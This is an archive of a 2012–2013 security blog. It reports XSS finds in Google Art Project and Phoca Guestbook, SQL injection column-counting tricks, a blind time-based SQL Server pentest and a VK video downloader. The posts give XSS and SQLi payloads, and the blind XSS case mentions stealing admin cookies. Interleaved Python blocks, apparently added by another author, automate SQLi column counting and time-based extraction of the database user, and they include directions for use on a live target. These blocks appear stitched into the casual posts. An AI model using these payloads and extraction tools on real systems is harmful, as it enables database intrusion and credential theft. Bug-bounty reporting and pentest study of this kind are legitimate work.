Friday, January 18, 2013
Wednesday, January 16, 2013
XSS in Google Art Project
Hi everyone.
This will be my 1st post for 2013. Hope it's still not too late to wish you guys a Happy New Year. Hope you all live happily beside your loved ones :D
A few weeks ago, I found an XSS in one of the Google websites, www.googleartprojects.com.
The vulnerable part was found in the search box. Tested the input validation and checked the page source,
hmmmm???? Looks quite promising. Just testing my luck using a simple XSS payload
x"</title><img src%3dx onerror%3dalert(1)>
and..
BOOM! It's executed!
My 1st XSS found in Google Inc!
Immediately made a POC report and submitted it to the Google security team.
They received my report on Jan 7, 2013.
And I received this email early in the morning (different timezone -___-")
And I'll be in the Google Hall of Fame in the next few days! Congratz to myself.
Then I tried around to test more on it, and found that there's a stored XSS in it as well!
BUT, unfortunately, because of my 1st report, my next report on the same website was classified as a duplicate -___-"
Days after submitting the report, I googled around about this website and found that there was already a report made by @NightRang3r (Mr Shai Rod) previously on this website. He found a stored XSS in it.
That's all.
Thanks
@yappare
Friday, December 7, 2012
Wednesday, November 28, 2012
Phoca Guestbook XSS
Found an XSS, and possibly a permanent and blind XSS.
Reported to the right person, and they came out with an updated version to fix the issue.
Get the updated version here
Steps to reproduce the bug:
Complete the message/comment box. Each of the form fields is vulnerable to XSS.
The XSS payload is successfully stored. If the comment/message needs validation from an admin, we can use a direct payload to get the admin's cookies; this attack is known as Blind XSS.
Date reported : 25/10/2012
Date fixed : 21/11/2012
Date published: 29/11/2012
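Both XSS posts above (the reflected payload that breaks out of the Google Art Project search page's <title>, and the stored/blind case in the Phoca Guestbook form fields) come down to the same root cause: user input written into HTML without output encoding. The Python below is an added example, not code from either post and not Phoca's or Google's code. The page templates, the Guestbook class and the is_exploitable check are constructed for illustration; it shows why the payload needs the "</title>" breakout (a browser treats everything inside <title> as inert text until the first closing tag) and how escaping on output closes both holes.

```python
import html
import re

# Payload from the Google Art Project post (the %3d in the original is just a
# URL-encoded "="). The "</title>" is what matters: without it the <img> would
# stay inert text inside the <title> element.
BREAKOUT = 'x"</title><img src=x onerror=alert(1)>'


def search_page_vulnerable(query):
    """Constructed search page that reflects the query into <title> unescaped."""
    return "<html><head><title>Search: %s</title></head><body>results</body></html>" % query


def search_page_fixed(query):
    """Same page with output encoding: &lt; &gt; &quot; can no longer close <title>."""
    return "<html><head><title>Search: %s</title></head><body>results</body></html>" % (
        html.escape(query, quote=True))


class Guestbook:
    """Constructed stand-in for a guestbook/comment form: entries are stored and
    rendered later, possibly on an admin moderation page (the stored/blind case)."""

    def __init__(self, escape_on_output):
        self.escape_on_output = escape_on_output
        self.entries = []

    def post(self, name, message):
        # Storing raw input is fine; the bug (or fix) lives in render().
        self.entries.append((name, message))

    def render(self):
        rows = []
        for name, message in self.entries:
            if self.escape_on_output:
                name = html.escape(name, quote=True)
                message = html.escape(message, quote=True)
            rows.append('<div class="entry"><b>%s</b>: %s</div>' % (name, message))
        return "\n".join(rows)


# First <title>...</title> span is RCDATA: markup inside it never executes.
TITLE_RCDATA = re.compile(r"<title>.*?</title>", re.I | re.S)
# A real tag carrying an on* event handler attribute.
HANDLER_TAG = re.compile(r"<(?:img|svg|script|body|iframe)\b[^>]*\bon\w+\s*=", re.I)


def is_exploitable(page):
    """Crude check: does a tag with an on* handler survive as real markup?
    The first <title> span is dropped before looking, so a payload that did
    not break out of <title> is correctly reported as inert."""
    outside_title = TITLE_RCDATA.sub("", page, count=1)
    return HANDLER_TAG.search(outside_title) is not None


if __name__ == "__main__":
    print("reflected, vulnerable :", is_exploitable(search_page_vulnerable(BREAKOUT)))
    print("reflected, fixed      :", is_exploitable(search_page_fixed(BREAKOUT)))
    print("no </title> breakout  :", is_exploitable(search_page_vulnerable("<img src=x onerror=alert(1)>")))
    gb = Guestbook(escape_on_output=False)
    gb.post("mallory", BREAKOUT)
    print("stored, vulnerable    :", is_exploitable(gb.render()))
    gb = Guestbook(escape_on_output=True)
    gb.post("mallory", BREAKOUT)
    print("stored, fixed         :", is_exploitable(gb.render()))
```

The check is deliberately simple (a regex, not an HTML parser) and only illustrates the one context the posts hit; in a real review the fix is to escape for the exact output context (HTML body, attribute, JavaScript string) every time data is written out, not only in these two templates.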
Thanks,
@yappare
Friday, November 23, 2012
Tuesday, November 20, 2012
Counting Columns in SQLi
Hi there.
As we already know, the most common way to count the number of columns in a SQL injection attack is via an ORDER BY query.
Example as below:
http://example.org/news.php?id=8 order by 5--
If the page loads normally, the query has at least 5 columns, so try the next one:
http://example.org/news.php?id=8 order by 6--
Once the number exceeds the real column count an error appears, and on MySQL it usually looks like
Unknown column '6' in 'order clause'
From here we know that exactly 5 columns exist and can proceed with the SQLi, for example
http://example.org/news.php?id=-8 union select 1,2,3,4,5--
(the negative id makes the original query return no row, so the UNION row is the one displayed) and so on. Note that MySQL only treats -- as a comment when it is followed by whitespace, so in a URL it is usually sent as --+ or -- -. But if you encounter a scenario where you can't use ORDER BY because of a WAF or any other reason, there are still some ways to count it.
1 - Use a GROUP BY query
Similar to the ORDER BY technique, but instead of ORDER BY we use GROUP BY:
http://example.org/news.php?id=8 group by 5--
If the page loads normally, the number of columns is still at least 5; then try
http://example.org/news.php?id=8 group by 6--
Once the number exceeds the real column count an error appears, and on MySQL it usually looks like
Unknown column '6' in 'group statement'
Another way is:
2 - Set a condition such as (the main query) = (select 1)
As an example,
http://example.org/news.php?id=8 and (select * from news)=(select 1)
Here we compare a whole row of the table (select * from news, i.e. every column of the news table) with a one-column subquery. MySQL refuses to compare operands of different widths, and the error message tells us the number of columns:
Operand should contain 5 column(s)
This needs the table name and a page that displays database errors, and it reports the width of the news table, which equals the injected query's column count only when the page really does SELECT * from that table.
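As an added example (not the post's own code), here is a small Python helper that automates the three probes above. Rather than stepping ORDER BY 1, 2, 3, ... it binary-searches for the last column number that does not raise "Unknown column", and it reads the count straight out of the "Operand should contain N column(s)" error for the third technique. The fetch function, the example.org target and the fake_fetch stand-in are assumptions: fake_fetch emulates a MySQL-backed news.php with a 5-column news table so the block runs offline, and the probes assume the page shows database errors in its response.

```python
import re

# The two MySQL error messages the probes rely on.
ERR_UNKNOWN_COLUMN = re.compile(r"Unknown column '(\d+)' in '(?:order clause|group statement)'")
ERR_OPERAND = re.compile(r"Operand should contain (\d+) column\(s\)")


def count_by_clause(fetch, clause="order by", max_cols=64):
    """Find the column count with ORDER BY n / GROUP BY n probes.

    fetch(suffix) must return the response body for id=8 followed by suffix.
    Binary search for the largest n that does not raise "Unknown column",
    so about six requests cover up to 64 columns.
    """
    if not ERR_UNKNOWN_COLUMN.search(fetch(" %s %d-- " % (clause, max_cols))):
        raise ValueError("no error at %d columns: raise max_cols, or errors are not displayed" % max_cols)
    lo, hi = 1, max_cols - 1            # ORDER BY 1 always works when there is a result set
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if ERR_UNKNOWN_COLUMN.search(fetch(" %s %d-- " % (clause, mid))):
            hi = mid - 1                # mid is past the last column
        else:
            lo = mid                    # mid is still in range
    return lo


def count_by_operand(fetch, table):
    """Read the count from MySQL's 'Operand should contain N column(s)' error.

    This reports the width of `table`, which equals the injected query's column
    count only when the page really selects * from that table.
    """
    body = fetch(" and (select * from %s)=(select 1)-- " % table)
    m = ERR_OPERAND.search(body)
    if not m:
        raise ValueError("operand error not displayed; fall back to the ORDER BY / GROUP BY probes")
    return int(m.group(1))


# --- constructed offline target, not a real site ---------------------------
# Behaves like a MySQL-backed news.php whose query returns 5 columns from a
# table called `news` and echoes database errors into the page.
FAKE_COLUMNS = 5


def fake_fetch(suffix):
    m = re.match(r"\s*(order|group) by (\d+)--", suffix, re.I)
    if m:
        n = int(m.group(2))
        if n > FAKE_COLUMNS:
            where = "order clause" if m.group(1).lower() == "order" else "group statement"
            return "Unknown column '%d' in '%s'" % (n, where)
        return "<html>normal news page</html>"
    if re.match(r"\s*and \(select \* from news\)=\(select 1\)", suffix, re.I):
        return "Operand should contain %d column(s)" % FAKE_COLUMNS
    return "<html>normal news page</html>"


if __name__ == "__main__":
    print("order by :", count_by_clause(fake_fetch))
    print("group by :", count_by_clause(fake_fetch, clause="group by"))
    print("operand  :", count_by_operand(fake_fetch, "news"))
```

To use it against an authorised target, replace fake_fetch with a function that appends the suffix to the id parameter, sends the request and returns the body; the suffix ends in "-- " (with the trailing space) so that MySQL treats it as a comment.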
Thanks,
@yappare a.k.a p0pc0rn
Monday, November 19, 2012
VKDownloader V2
Remember the 1st vkdownloader python script? Look at here http://c0rni3sm.blogspot.com/2012/01/vkdownloader-python-script.html
..quite messy. I'm not good at programming actually, still learning from the basics.. the old version won't work anymore; a little modification is needed, and here I share with you all the 2nd version of VKDownloader.
How to use? Just like the old one :)
1 - you need Python on your PC
2 - copy the video code
3 - run it using the command python vkdownloader_v2.py "url code"
#!/usr/bin/python
# VK Downloader V2 by p0pc0rn 2012
# Reads the embed page of a VK video and prints the direct .mp4 links.
import sys
import re
try:
    from urllib2 import urlopen            # Python 2
except ImportError:
    from urllib.request import urlopen     # Python 3

if len(sys.argv) < 2:
    print("""
## Usage : python vkdownloader_v2.py "Url" ##
-------------------------------------------------------------------------------------------
Example :
python vkdownloader_v2.py "http://vk.com/video_ext.php?oid=1111111&id=2222222&hash=4333333"
-------------------------------------------------------------------------------------------
## VK Downloader V2 by p0pc0rn 2012 ##
""")
    sys.exit(0)

url = sys.argv[1]

# The embed page carries the pieces of the download URL in three JS variables.
find_host = re.compile(r"var video_host = '(.*?)';")
find_uid = re.compile(r"var video_uid = '(.*?)';")
find_vtag = re.compile(r"var video_vtag = '(.*?)';")

# Fetch the page once (the first version fetched the same URL three times).
data = urlopen(url).read().decode('utf-8', 'replace')

host = find_host.search(data)
uid = find_uid.search(data)
vtag = find_vtag.search(data)
if not (host and uid and vtag):
    print("video_host / video_uid / video_vtag not found; the embed page format may have changed.")
    sys.exit(1)

base = host.group(1).replace("userapi.com", "vk.com") + 'u' + uid.group(1) + '/videos/' + vtag.group(1)
for quality in ('360', '480', '720'):
    print('Download link for %sp => %s.%s.mp4' % (quality, base, quality))
or simply get it here http://pastebin.com/K3ht0Bc7
Friday, November 9, 2012
Listed as an eBay Security Researcher
Located at their page here http://pages.ebay.com/securitycenter/ResearchersAcknowledgement.html
Thank you eBay Security Team.
:D
@yappare.
Tuesday, October 23, 2012
SQL Server Blind Time-Based Technique
O hye everyone! Seems my blog is full of XSS collections nowadays and yeah.. some of you might not be interested in this stuff since it's quite childish.. but well.. I'm too lazy to update my blog LOL.
But today I felt guilty about my blog, and here you go.. another experience with a client and their client/server application.
Remember the Blind Oracle Injection in a client/server application from my previous previous preeeeviiiiooouussss post? Haha. Well, this time, a few weeks ago, I was instructed by my boss to do a pentest on one of the client's applications.
The application uses a Java servlet environment as well, a client/server application. This time I couldn't use my own computer; I needed to use their development testing computer. Without any internet connection, it was quite tough for me to gain some information from the internet.
Browsing a little in the application, checking how it works.. hurmm.. nothing interesting.. just a simple client/server application, but with quite complicated modules, like the previous one I tested..
hmmm.. ouh?! suddenly..
there's a search box where I can try to search for a valid customer by entering their name... ahaa.. this is quite interesting.. it's similar to the previous thing I found.
I tried to check a valid user.
ahaa.. ahaa.. it appears..
then.. with the power of the single quote!
woops!!! OMG! OMG! OMG!.. haha.. so there's probably a SQL injection in it! Oh how lucky.
But there are some limitations on it. I tried to count the columns; that's possible, but a union-based method won't succeed. hurmm..
What should I do? Ah, go for lunch first :D
During my lunch, I tried to browse some good information on SQLi. Oh yeah, since I already knew the backend server was running on SQL Server, this narrowed my search.
Here are some of my references:
http://technet.microsoft.com/en-us/library/cc512676.aspx
and of course the greatest cheat sheet, http://pentestmonkey.net/category/cheat-sheet
Back from lunch!
Trying my luck!
bazinga; 1' IF (LEN(USER)=7) WAITFOR DELAY '0:0:10'--
It gives a FALSE reply.
* the server will not wait 10 secs since the length of the current user is not 7 chars.
bazinga; 1' IF (LEN(USER)=8) WAITFOR DELAY '0:0:10'--
auw yeah.. a TRUE reply
* the server will wait 10 secs since the length of the current user is exactly 8 chars.
Then proceeding to check the current user in case the client needs another POC.
bazinga; 1' IF (ASCII(lower(substring((USER),1,1)))>105) WAITFOR DELAY '0:0:10'--
it's J
bazinga; 1' IF (ASCII(lower(substring((USER),2,1)))>49) WAITFOR DELAY '0:0:5'--
it's 2
bazinga; 1' IF (ASCII(lower(substring((USER),3,1)))>101) WAITFOR DELAY '0:0:5'--
it's E
bazinga; 1' IF (ASCII(lower(substring((USER),4,1)))>101) WAITFOR DELAY '0:0:5'--
it's E
bazinga; 1' IF (ASCII(lower(substring((USER),5,1)))>106) WAITFOR DELAY '0:0:5'--
it's another J
And no need to proceed any more since I can already guess the current user is j2eejdb
And then, trying my luck using the username as the password as well to connect to the SQL Server.
Gotcha! I'm in!
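The probes above were typed by hand, one threshold per character. As an added example (not the author's script, and not something that was run against the client), the Python below automates the same time-based technique: it keeps the post's bazinga; 1' IF (...) WAITFOR DELAY '0:0:N'-- shape, which assumes the search value lands inside a single-quoted string literal in a T-SQL query, and binary-searches the length and then every character of USER so each character costs 7 requests instead of a hand-picked guess. The timing_oracle wrapper, the DELAY value, FAKE_USER and fake_ask are assumptions: fake_ask evaluates the injected condition against a made-up login instead of sleeping, so the block runs offline.

```python
import re
import time

DELAY = 5  # seconds the TRUE branch sleeps; pick it well above the target's normal response time


def payload(condition, delay=DELAY):
    """Wrap a T-SQL boolean in the injection shape used in the post: the quote
    closes the string literal of the WHERE clause, and WAITFOR DELAY runs only
    when `condition` holds."""
    return "bazinga; 1' IF (%s) WAITFOR DELAY '0:0:%d'--" % (condition, delay)


def timing_oracle(send, delay=DELAY):
    """Turn a request function into a boolean oracle. send(value) must submit
    the search string; the answer is TRUE iff the round trip took >= delay."""
    def ask(condition):
        start = time.monotonic()
        send(payload(condition, delay))
        return time.monotonic() - start >= delay
    return ask


def find_length(ask, max_len=128):
    """Binary-search LEN(USER): the smallest n for which LEN(USER)>n is false."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if ask("LEN(USER)>%d" % mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def find_char(ask, pos):
    """Binary-search one character of USER over printable ASCII 32..126 (7 probes)."""
    lo, hi = 32, 126
    while lo < hi:
        mid = (lo + hi) // 2
        if ask("ASCII(SUBSTRING(USER,%d,1))>%d" % (pos, mid)):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def extract_user(ask):
    """Recover the whole user name: length first, then one character at a time."""
    length = find_length(ask)
    return "".join(find_char(ask, i) for i in range(1, length + 1))


# --- constructed offline stand-in, no SQL Server involved -------------------
# Parses the injected condition and answers it for a made-up login, so the
# search logic can be exercised without a target or any sleeping.
FAKE_USER = "j2eejdb"


def fake_ask(condition):
    m = re.fullmatch(r"LEN\(USER\)>(\d+)", condition)
    if m:
        return len(FAKE_USER) > int(m.group(1))
    m = re.fullmatch(r"ASCII\(SUBSTRING\(USER,(\d+),1\)\)>(\d+)", condition)
    if m:
        return ord(FAKE_USER[int(m.group(1)) - 1]) > int(m.group(2))
    raise ValueError("unexpected condition: " + condition)


if __name__ == "__main__":
    print("LEN(USER) =", find_length(fake_ask))
    print("USER      =", extract_user(fake_ask))
```

Against a live target, wrap your request function with timing_oracle and pass the result to extract_user; send probes one at a time, measure the normal response time first, and repeat any answer that lands close to the DELAY threshold, because network jitter is the usual source of a wrong bit in a time-based extraction.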
Thanks for reading :)
P/S boss, if you're reading this.. please.. don't let me struggle with this client/server application anymore.. pleaaseeeee. hahahaa.. but I'll do it if there's a.. *cough2.. increment or.. *cough2. bonus.. *cough :P
Sunday, October 21, 2012
Sunday, October 14, 2012
iHack+ 2012 - Hacking Competition
Are you a student at any local university in Malaysia? If yes, come and join this hacking competition!
A hacking competition organized by UiTM for students in Malaysia.
For more info, Click Here
RM80,000 awaits you all!!